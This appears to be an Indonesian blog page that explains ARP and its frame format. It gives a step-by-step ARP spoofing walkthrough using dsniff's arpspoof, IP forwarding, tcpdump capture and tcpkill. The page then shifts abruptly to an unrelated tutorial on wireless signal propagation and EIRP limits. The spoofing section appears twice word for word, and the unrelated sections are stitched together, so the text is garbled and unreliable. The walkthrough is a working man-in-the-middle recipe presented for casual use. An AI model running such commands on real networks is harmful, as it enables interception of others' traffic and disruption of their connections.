Address Resolution Protocol disingkat ARP adalah sebuah protokol dalam TCP/IP Protocol Suite yang bertanggungjawab dalam melakukan resolusi alamat IP ke dalam alamat Media Access Control (MAC Address). ARP didefinisikan di dalam RFC 826.
Ketika sebuah aplikasi yang mendukung teknologi protokol jaringan TCP/IP mencoba untuk mengakses sebuah host TCP/IP dengan menggunakan alamat IP, maka alamat IP yang dimiliki oleh host yang dituju harus diterjemahkan terlebih dahulu ke dalam MAC Address agar frame-frame data dapat diteruskan ke tujuan dan diletakkan di atas media transmisi (kabel, radio, atau cahaya), setelah diproses terlebih dahulu oleh Network Interface Card (NIC). Hal ini dikarenakan NIC beroperasi dalam lapisan fisik dan lapisan data-link pada tujuh lapis model referensi OSI dan menggunakan alamat fisik daripada menggunakan alamat logis (seperti halnya alamat IP atau nama NetBIOS) untuk melakukan komunikasi data dalam jaringan.
ARP akan melakukan broadcast terhadap sebuah ARP Request Packet yang berisi seolah-olah “Siapa yang memiliki alamat IP www.xxx.yyy.zzz??”. Broadcast ini akan melakukan request terhadap MAC address dari komputer yang dituju. Host tujuan kemudian merespons dengan menggunakan ARP Reply Packet yang mengandung alamat MAC yang dimilikinya. Host yang melakukan request selanjutnya menyimpan pemetaan alamat IP ke dalam MAC Address di dalam Local ARP Cache secara sementara, siapa tahu nantinya akan diakses lagi di lain waktu.
Jika memang alamat yang dituju berada di luar jaringan lokal, maka ARP akan mencoba untuk mendapatkan MAC address dari antarmuka router lokal yang menghubungkan jaringan lokal ke luar jaringan (di mana komputer yang dituju berada).
Seperti apa bentuk format frame ARP? Terdiri dari 2 bagian, yaitu header ethernet dan paket ARP. Header ethernet berupa :
- 6 byte alamat tujuan
- 6 byte alamat pengirim
- 2 byte jenis frame ARP
Sedangkan paket ARPna berupa :
- 2 byte jenis alamat hardware (1 = ethernet)
- 2 byte jenis protokol yang di map (0800H = alamat IP)
- 1 byte ukuran alamat hardware
- 1 byte ukuran protokol
- 2 byte tipe operasi (1 = ARP request, 2=ARP reply, 3=*RARP request
,4=RARP reply)
- 6 byte alamat ethernet pengirim
- 4 byte alamat IP pengirim
- 6 byte alamat ethernet penerima
- 4 byte alamat IP penerima
*RARP (Reverse Address Resolution Protocol) digunakan untuk sistem komputer diskless, guna mendapatkan alamat IP mereka saat boot.
ARP Spoofing merupakan suatu kegiatan yang memanipulasi paket ARP. Misal paket X dari komputer A ditujukan untuk komputer B, ketika komputer A membroadcast paket ARP di jaringan, maka komputer C sang manipulator dapat "meracuni" (Posioning) paket ARP tsb agar paket X ditujukan ke komputer C terlebih dahulu baru diforward ke komputer B. Poisoning ini mengganti alamat MAC komputer B dengan alamat MAC komputer C di tabel ARP komputer A dan sebaliknya, alamat MAC komputer A diganti menjadi alamat MAC komputer C di tabel ARP komputer B. Jenis-jenis serangan yang bisa dilakukan dengan ARP Spoofing diantaranya adalah sniffing, Man in the Middle, MAC Flooding, DoS (Denial of Service), Hijacking n Cloning.
Apa saja sih yg diperlukan buat ARP Spoofing ini? Kalo saya pakai arpspoof yang ada di paket dsniff-2.3 untuk OS Linux. sebelum menginstall dsniff ini perlu dicek apakah di sistem yang digunakan sudah terinstall libnet ma libnids. Jangan lupa untuk jenis attacking sniffing ato MIM perlu IP Forwarding diaktifkan (echo 1 > /proc/sys/net/ipv4/ip_forward).
Seperti biasa, unpack paket dsniff lalu configure dan terakhir pake install.Pas saat makai, saya sempat dapat error compiling module sshcrypto :
sshcrypto.c:30: error: parse error before "des_key_schedule"
....blablabla
....blablabla
*** Error code 1
Solusinya kita buka dan edit file sshcrypto.c di folder dsniff-2.3, tambahkan :
#include
#include
di deklarasi file header yang diperlukan. Bila sudah selesai dan tidak ada error lagi, coba jalankan si dsniff atau si arpspoof
kita coba meracuni dan ngendus paket antara komputer A 192.168.1.1 n komputer B 192.168.1.3, komputer C (attacker) 192.168.1.6.
jalankan si arpspoof terlebih dahulu :
root@slack:~# arpspoof -t 192.168.1.1 192.168.1.3 & >/dev/null
root@slack:~# arpspoof -t 192.168.1.3 192.168.1.1 & >/dev/null
kalo sudah benar nanti di console akan muncul seperti ini :
0:c:29:3e:2d:46 0:15:e9:b5:83:62 0806 42: arp reply 192.168.1.3 is-at 0:c:29:3e:2d:46
0:e0:29:63:d1:6 0:15:e9:b5:83:62 0806 42: arp reply 192.168.1.3 is-at 0:e0:29:63:d1:6
Setelah itu bisa kita endus pake dsniff ato tcpdump, misalkan mau pakai tcpdump bisa kita capture hasilna ke file, pake :
root@slack:~# tcpdump -i eth0 -w endus.txt
dimana eth0 adalah interface card dan endus.txt adalah nama file outputna :). Kalo file tsb dibuka masi kaco isina >.<, jadi bisa kita lihat dengan tcpdump juga, pakai : root@slack:~# tcpdump -r endus.txt lumayan asik kan ARP Spoofing, tidak hanya buat sniffing juga tapi bisa kita blok koneksi tertentu misal : root@slack:~# tcpkill -9 host www.playboy.com Untuk mematikan proses si arpspoof n tcpdump bisa dengan cara : root@slack:~# killall arpspoof root@slack:~# killall tcpdump
- 6 byte alamat tujuan
- 6 byte alamat pengirim
- 2 byte jenis frame ARP
Sedangkan paket ARPna berupa :
- 2 byte jenis alamat hardware (1 = ethernet)
- 2 byte jenis protokol yang di map (0800H = alamat IP)
- 1 byte ukuran alamat hardware
- 1 byte ukuran protokol
- 2 byte tipe operasi (1 = ARP request, 2=ARP reply, 3=*RARP request
,4=RARP reply)
- 6 byte alamat ethernet pengirim
- 4 byte alamat IP pengirim
- 6 byte alamat ethernet penerima
- 4 byte alamat IP penerima
*RARP (Reverse Address Resolution Protocol) digunakan untuk sistem komputer diskless, guna mendapatkan alamat IP mereka saat boot.
ARP Spoofing merupakan suatu kegiatan yang memanipulasi paket ARP. Misal paket X dari komputer A ditujukan untuk komputer B, ketika komputer A membroadcast paket ARP di jaringan, maka komputer C sang manipulator dapat "meracuni" (Posioning) paket ARP tsb agar paket X ditujukan ke komputer C terlebih dahulu baru diforward ke komputer B. Poisoning ini mengganti alamat MAC komputer B dengan alamat MAC komputer C di tabel ARP komputer A dan sebaliknya, alamat MAC komputer A diganti menjadi alamat MAC komputer C di tabel ARP komputer B. Jenis-jenis serangan yang bisa dilakukan dengan ARP Spoofing diantaranya adalah sniffing, Man in the Middle, MAC Flooding, DoS (Denial of Service), Hijacking n Cloning.
Apa saja sih yg diperlukan buat ARP Spoofing ini? Kalo saya pakai arpspoof yang ada di paket dsniff-2.3 untuk OS Linux. sebelum menginstall dsniff ini perlu dicek apakah di sistem yang digunakan sudah terinstall libnet ma libnids. Jangan lupa untuk jenis attacking sniffing ato MIM perlu IP Forwarding diaktifkan (echo 1 > /proc/sys/net/ipv4/ip_forward).
Seperti biasa, unpack paket dsniff lalu configure dan terakhir pake install.Pas saat makai, saya sempat dapat error compiling module sshcrypto :
sshcrypto.c:30: error: parse error before "des_key_schedule"
....blablabla
....blablabla
*** Error code 1
Solusinya kita buka dan edit file sshcrypto.c di folder dsniff-2.3, tambahkan :
#include
#include
di deklarasi file header yang diperlukan. Bila sudah selesai dan tidak ada error lagi, coba jalankan si dsniff atau si arpspoof
kita coba meracuni dan ngendus paket antara komputer A 192.168.1.1 n komputer B 192.168.1.3, komputer C (attacker) 192.168.1.6.
jalankan si arpspoof terlebih dahulu :
root@slack:~# arpspoof -t 192.168.1.1 192.168.1.3 & >/dev/null
root@slack:~# arpspoof -t 192.168.1.3 192.168.1.1 & >/dev/null
kalo sudah benar nanti di console akan muncul seperti ini :
0:c:29:3e:2d:46 0:15:e9:b5:83:62 0806 42: arp reply 192.168.1.3 is-at 0:c:29:3e:2d:46
0:e0:29:63:d1:6 0:15:e9:b5:83:62 0806 42: arp reply 192.168.1.3 is-at 0:e0:29:63:d1:6
Setelah itu bisa kita endus pake dsniff ato tcpdump, misalkan mau pakai tcpdump bisa kita capture hasilna ke file, pake :
root@slack:~# tcpdump -i eth0 -w endus.txt
dimana eth0 adalah interface card dan endus.txt adalah nama file outputna :). Kalo file tsb dibuka masi kaco isina >.<, jadi bisa kita lihat dengan tcpdump juga, pakai : root@slack:~# tcpdump -r endus.txt lumayan asik kan ARP Spoofing, tidak hanya buat sniffing juga tapi bisa kita blok koneksi tertentu misal : root@slack:~# tcpkill -9 host www.playboy.com Untuk mematikan proses si arpspoof n tcpdump bisa dengan cara : root@slack:~# killall arpspoof root@slack:~# killall tcpdump
Rumus dari EIRP adalah :
EIRP = Power Output Transmitter (AP) - Cable loss + Antenna Gain
Kemudian ada beberapa faktor yang mempengaruhi transmisi sinyal wireless di udara, seperti Free Path Loss, Penyerapan Sinyal, Pemantulan Sinyal, Pemecahan Sinyal, Pembelokan Sinyal dan Line of Sight (LOS).
Apa itu Free Path Loss dan kawan-kawannya yang disebutkan diatas ? berikut penjelasan singkatnya :
Apa itu Free Path Loss dan kawan-kawannya yang disebutkan diatas ? berikut penjelasan singkatnya :
- Free Path Loss
Model dimana sebuah sinyal yang menjauhi sumbernya makin lama akan menghilang. Ilustrasinya seperti saat anda menjatuhkan batu secara vertikal ke sebuah kolam air, akan terbentuk gelombang yang menjauhi titk batu dijatuhkan dan semakin jauh semakin menghilang, namun tidak berhenti, hanya menghilang. Sama halnya seperti sinyal Gelombang Radio - Absorption ( Penyerapan/Peredaman Sinyal )
Seperti diketahui semakin besar Amplitudo gelombang (Power) Semakin jauh sinyal dapat memancar. Ini baik karena dapat menghemat acess point dan menjangkau lebih luas. Dengan mengurangi besar amplitudo (Power) suatu sinyal, maka jarak jangkauan sinyal tersebut akan berkurang. Faktor yang mempengaruhi transmisi wireless dengan mengurangi Amplitudo (Power) disebut Absorption (Penyerapan sinyal). Efek dari Penyerapan adalah panas. Masalah yang dapat dihadapi ketika signal di serap seluruhnya adalah, sinyal berhenti. Namun efek ini tidak mempengaruhi/ merubah panjang gelombang dan frekuensi dari sinyal tersebut.
Anda pasti bertanya-tanya, benda apa yang dapat menyerap signal. Tembok, tubuh manusia, dan karpet dapat menyerap/meredam sinyal. Benda yang dapat menyerap/meredam suara dapat meredam sinyal.
Peredaman sinyal ini perlu diperhitungkan juga saat akan mendeploy jaringan wireless dalam gedung, terutama bila ada kaca dan karpet. karena dalam hal ini peredaman sinyal akan terjadi. - Pemantulan Sinyal
Sinyal radio bisa memantul bila menemui cermin/kaca. Biasanya banyak terjadi pada ruangan kantor yang di sekat. PemantulanI pun tergantung dari frekuensi signalnya. Ada beberapa frekuensi yang tidak terpengaruh sebanyak frekuensi yang lainnya. Dan salah satu efek dari pemantulan sinyal ini adalah terjadinya Multipath.
Multipath artinya singnal datang dari 2 arah yang berbeda. Karakteristiknya adalah penerima kemungkinan menerima signal yang sama beberapa kali dari arah yang berbeda. Ini tergantung dari panjang gelombang dan posisi penerima. Karakteristik lainnya adalh Multipath dapat menyebabkan sinyal yang = nol, artinya saling membatalkan, atau dikenal dengan istilah Out Of Phase signal. - Pemecahan Sinyal / Scattering
Isu dari pemecahan sinyal terjadi saat sinyal dikrim dalam banyak arah. Hal ini dapat disebabkan oelh beberapa objek yang dapat memantulkan signal dan ujung yang lancip, seperti partikel debu di air dan udara. Ilustrasinya dalah menyinari lampu ke pecahan kaca. Cahaya akan dipantulkan ke banyak arah dan menyebar. Dalam skala besar adalah bayangkan saat cuaca hujan. Hujan yang besar mempunyai kemampuan memantulkan sinyal. oleh karena itu disaat Hujan , sinyal wireless dapat terganggu. - Pembelokan Sinyal / Refraction
Refraction adalah perubahan arah, atau pembelokan dari sinyal disaat sinyal melewati sesuatu yang beda massanya. Sebagai contoh sinyal yang melewati segelas air. Sinyal ada yang di pantulkan dan ada yang dibelokkan. - LOS (Line of Sight)
Line of Sight artinya suatu kondisi dimana pemancar dapat melihat secara jelas tanpa halangan sebuah penerima. Walaupun terjadi kondisi LOS, belum tentu tidak ada gangguan pada jalur tersebut. Dalam hal ini yang harus diperhitungkan adalah - Penyerapan sinyal, pemantulan sinyal, pemecahan sinyal. Bahkan dalam jarak yang lebih jauh bumi menjadi sebuah halangan, seperti kontur bumi, gunung, pohon, dan halangan lingkungan lainnya.
- Fresnel Zone
Sebagai latar belakang, Augustin-Jean Fresnel adalah seorang fisikawan Prancis dan sarjana sipil yang hidup di tahun 1788 ~ 1827. Beliau secara tepat mengasumsikan bahwa cahaya bergerak seperti gelombang. Dan karena penemuan beliau, sebuah metoda untuk menentukan dimana pemantulan akan terjadi di antara pengirim dan penerima, dan diberi nama seperti namanya. Inilah yang disebut Fresnel Zone. Rumus Fresnel Zone ini dapat menentukan posisi ketinggian antena dengan Jarak yang dapat di tembus oleh sinyal Wireless. Dengan perhitungan yang tepat akan didapatkan hasil yang memuaskan dan tentunya diperhitungkan. Namun penerapan di Indoor sinyalnya terlalu pendek sehingga tidak terlalu berefek dalam jaringan wifi indoor. - Received Signal Strength Indicator (RSSI)
RSSI ini menggunakan nilai yang spesifik untuk tiap vendor. Oleh karena itu penilaian vendor A belum tentu sama dengan vendor B. RSSI biasa diukur dalam besaran dBm. Salah satu alat untk menentukan RSSI adalah software Network Stumbler. - Signal to Noise Ratio (SNR)
SNR adalah istilah yang digunakan untuk menggambarkan seberapa kuat sinyal dibandingkan dengan gangguan di sekeliling yang menggangu sinyal. Bila Sinyal lebih kuat daripada gangguan / Noise maka sinyal dapat di tankap oleh receiver lebih baik, dan sebaliknya demikian. Blla Noise sekitar terlalu besar, maka yang akan di tangkap oleh receiver adalah sinyal yang samr-samar dan transmisi data tidak dimengerti. Bila Aplikasi yang anda gunakan dapat melaporkan pengukuran SNR, lebih baik bila mendapatkan angka yang lebih tinggi, namun juga dibuat berdasar nilai RSSI nya, sehingga juga ditentukan sendiri oleh vendor. - Link Budget
Link Budget adalah nilai yang menghitung semua gain dan loss antara pengirim dan penerima, termasuk atenuasi, penguatan / gain antena, dan loss lainnya yang dapat terjadi. Link Budget dapat berguna untuk menentukan berapa banyak power yang dibutuhkan untuk mengirimkan sinyal agar dapat di mengerti oleh penerima sinyal.
Berikut adalah rumus sederhana untuk menentukan Link Budget :
Received Power (dBm) = Transmitted Power (dBm) + Gains (dB) - Losses (dB)
Terutama bagi anda yang akan mendesign sebuah jaringan wireless yang tidak hanya asal Connect dan jalan.
Untuk menjamin bahwa frekuensi reuse dapat digunakan dengan baik, kita perlu membatasi maksimum daya yang diijinkan untuk terbang dari antenna. Salah satu batasan yang biasa digunakan adalah Effective Isotropic Radiated Power (EIRP). Effective Isotropics Radiated Power (EIRP) dapat dihitung dengan mudah menggunakan rumus berikut,
Effective Isotropic Radiated Power (EIRP) dalam dBm
= daya di input antenna [dBm] + penguatan antenna [dBi]
Effective Radiated Power (ERP) dalam dBm
= daya di input antenna [dBm] + penguatan antenna [dBd]
Effective Isotropic Radiated Power (EIRP) biasanya kita gunakan. Kita biasanya membatasiEIRP sekitar 36dBm.Batas Legal
Batas EIRP yang legal pada frekeunsi 2.4GHz di Indonesia adalah:- Untuk Point-to-Point (P2P) 36dBm
- Untuk Point-to-Multi-Point (P2MP) 30dBm
- Daya pancar maksimum 100mW (20dBm).
Contoh perhitungan daya Effective Isotropic Radiated Power (EIRP)
| TX Power | TX Power (dBm) | Power Gain / Loss | Input Power ke Antenna | Antenna | EIRP | Legal (Yes / No) |
|---|---|---|---|---|---|---|
| 1 Watt | (+30 dBm) | -1 dB loss via 1 m coax | + 29 dBm | +6 dBi | +35 dBm | Yes |
| 100 mW | (+20 dBm) | +14 dB Amplifier | +34 dBm | +8 dBi | +42 dBm | No |
| 25 mW | (+14 dBm) | +14 dB Amplifier | +28 dBm | +8 dBi | +36 dBm | Yes |
0 komentar:
Posting Komentar